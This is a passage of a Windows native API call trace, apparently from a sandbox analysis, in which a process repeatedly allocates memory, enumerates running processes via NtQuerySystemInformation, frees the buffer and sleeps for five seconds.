BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0247.191] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0247.194] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0247.195] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0247.196] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0247.196] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0247.197] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0247.197] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0247.197] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0247.201] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0247.203] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0247.205] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0247.206] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0247.207] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0247.207] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0247.208] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0247.213] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0247.214] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0247.215] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0247.215] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0247.217] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0247.217] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0247.217] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0247.222] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0247.223] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0247.225] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0247.225] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0247.226] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0247.227] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0247.227] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0247.232] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0247.233] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0247.235] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0247.235] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0247.236] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0247.236] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0247.237] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0247.242] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0247.242] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0247.244] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0247.244] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0247.245] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0247.245] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0247.246] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0247.251] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0247.253] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0247.254] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0247.255] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0247.256] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0247.256] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0247.256] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0247.263] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0247.264] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0247.267] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0247.267] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0247.268] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0247.268] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0247.269] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0247.273] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0247.274] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0247.276] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0247.277] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0247.277] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0247.278] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0247.278] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0247.282] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0247.283] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0247.284] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0247.285] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0247.285] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0247.286] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0247.286] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0247.291] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0247.292] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0247.293] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0247.293] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0247.294] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0247.294] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0247.295] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0247.300] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0247.300] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0247.302] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0247.302] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0247.303] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0247.304] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0247.304] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0247.311] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0247.312] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0247.314] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0247.314] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0247.315] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0247.315] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0247.315] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0247.320] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0247.321] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0247.323] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0247.323] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0247.324] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0247.324] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0247.324] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0247.329] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0247.330] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0247.331] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0247.331] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0247.332] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0247.332] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0247.332] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0247.336] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0247.337] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0247.350] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0247.350] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0247.351] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0247.352] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0247.352] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0247.357] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0247.358] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0247.360] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0247.360] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0247.361] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0247.362] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0247.362] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0247.366] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0247.367] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0247.370] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0247.371] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0247.372] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0247.372] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0247.372] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0247.377] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0247.378] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0247.380] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0247.380] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0247.382] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0247.382] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0247.383] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0247.387] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0247.389] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0247.391] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0247.391] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0247.392] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0247.392] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0247.392] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0247.397] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0247.398] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0247.399] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0247.399] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, 